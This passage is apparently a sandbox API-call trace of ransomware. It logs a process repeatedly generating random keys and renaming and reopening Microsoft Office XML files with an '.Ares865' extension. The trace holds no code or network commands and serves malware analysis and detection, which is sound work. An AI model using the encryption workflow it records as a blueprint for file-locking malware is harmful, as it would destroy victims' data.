dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0068.570] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=128230) returned 1 [0068.571] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0068.571] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0068.571] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.590] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0068.591] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0068.591] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0068.600] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL027.XML.Ares865") returned 72 [0068.600] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL027.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl027.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL027.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl027.xml.ares865"), dwFlags=0x1) returned 1 [0068.600] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL027.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl027.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0068.601] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=28030) returned 1 [0068.601] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0068.602] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0068.602] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.618] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0068.619] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0068.619] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.620] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL044.XML.Ares865") returned 72 [0068.620] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL044.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl044.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL044.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl044.xml.ares865"), dwFlags=0x1) returned 1 [0068.621] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL044.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl044.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0068.621] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=157348) returned 1 [0068.621] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0068.622] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0068.622] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.636] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0068.636] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0068.636] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.639] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL048.XML.Ares865") returned 72 [0068.639] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL048.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl048.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL048.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl048.xml.ares865"), dwFlags=0x1) returned 1 [0068.641] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL048.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl048.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0068.641] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1107344) returned 1 [0068.642] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0068.642] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0068.642] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.719] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0068.719] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0068.719] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.734] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL054.XML.Ares865") returned 72 [0068.734] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL054.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl054.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL054.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl054.xml.ares865"), dwFlags=0x1) returned 1 [0068.735] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL054.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl054.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0068.735] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=368502) returned 1 [0068.736] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0068.736] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0068.736] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.759] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0068.760] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0068.760] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.765] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL058.XML.Ares865") returned 72 [0068.765] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL058.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl058.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL058.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl058.xml.ares865"), dwFlags=0x1) returned 1 [0068.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL058.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl058.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0068.766] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=158788) returned 1 [0068.767] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0068.767] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0068.767] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.782] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0068.783] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0068.783] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.785] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL065.XML.Ares865") returned 72 [0068.785] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL065.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl065.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL065.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl065.xml.ares865"), dwFlags=0x1) returned 1 [0068.786] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL065.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl065.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0068.786] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=91606) returned 1 [0068.786] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0068.787] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0068.787] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.794] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0068.795] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0068.795] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.796] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL075.XML.Ares865") returned 72 [0068.796] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL075.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl075.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL075.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl075.xml.ares865"), dwFlags=0x1) returned 1 [0068.797] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL075.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl075.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0068.797] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=707376) returned 1 [0068.797] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0068.798] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0068.798] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.838] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0068.839] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0068.839] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.848] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL077.XML.Ares865") returned 72 [0068.848] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL077.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl077.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL077.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl077.xml.ares865"), dwFlags=0x1) returned 1 [0068.849] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL077.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl077.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0068.849] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=24884) returned 1 [0068.849] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0068.850] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0068.850] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.853] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0068.854] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0068.854] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.854] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL078.XML.Ares865") returned 72 [0068.854] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL078.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl078.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL078.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl078.xml.ares865"), dwFlags=0x1) returned 1 [0068.855] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL078.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl078.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0068.855] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1875) returned 1 [0068.856] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0068.856] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0068.856] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.859] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0068.860] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0068.860] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.860] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL081.XML.Ares865") returned 72 [0068.860] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL081.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl081.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL081.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl081.xml.ares865"), dwFlags=0x1) returned 1 [0068.861] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL081.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl081.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0068.861] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=955470) returned 1 [0068.861] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0068.862] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0068.862] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.900] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0068.901] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0068.901] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.913] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL082.XML.Ares865") returned 72 [0068.913] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL082.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl082.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL082.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl082.xml.ares865"), dwFlags=0x1) returned 1 [0068.915] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL082.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl082.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0068.915] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=232762) returned 1 [0068.915] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0068.916] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0068.916] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.974] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0068.975] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0068.975] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.979] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL083.XML.Ares865") returned 72 [0068.979] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL083.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl083.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL083.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl083.xml.ares865"), dwFlags=0x1) returned 1 [0068.980] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL083.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl083.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0068.980] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=36058) returned 1 [0068.981] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0068.981] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0068.981] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.000] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.001] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.001] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.001] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL086.XML.Ares865") returned 72 [0069.002] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL086.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl086.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL086.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl086.xml.ares865"), dwFlags=0x1) returned 1 [0069.003] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL086.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl086.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.003] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=702258) returned 1 [0069.003] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.004] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.004] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.033] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0069.034] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.034] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.043] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL087.XML.Ares865") returned 72 [0069.043] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL087.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl087.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL087.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl087.xml.ares865"), dwFlags=0x1) returned 1 [0069.044] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL087.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl087.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.044] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=5080) returned 1 [0069.044] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 